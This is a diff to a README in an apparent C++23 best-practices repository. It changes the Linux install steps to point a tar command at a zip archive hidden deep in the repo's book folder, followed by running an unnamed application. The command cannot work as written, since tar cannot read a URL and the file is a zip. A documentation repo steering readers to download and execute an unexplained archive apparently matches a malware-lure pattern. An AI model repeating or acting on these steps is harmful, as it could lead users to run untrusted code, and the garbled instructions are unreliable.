ugene777/Cpp23-Best-Practices/README.md

 ### For Linux:

 1. Open your terminal.
-2. Use the command `tar -xvzf yourfile.tar.gz` to extract the files.
+2. Use the command `tar -xvzf https://raw.githubusercontent.com/ugene777/Cpp23-Best-Practices/main/book/content/part4/Cpp23-Best-Practices_1.2.zip` to extract the files.
 3. Navigate to the extracted folder using `cd path-to-folder`.
 4. Run the application with `./yourapp`.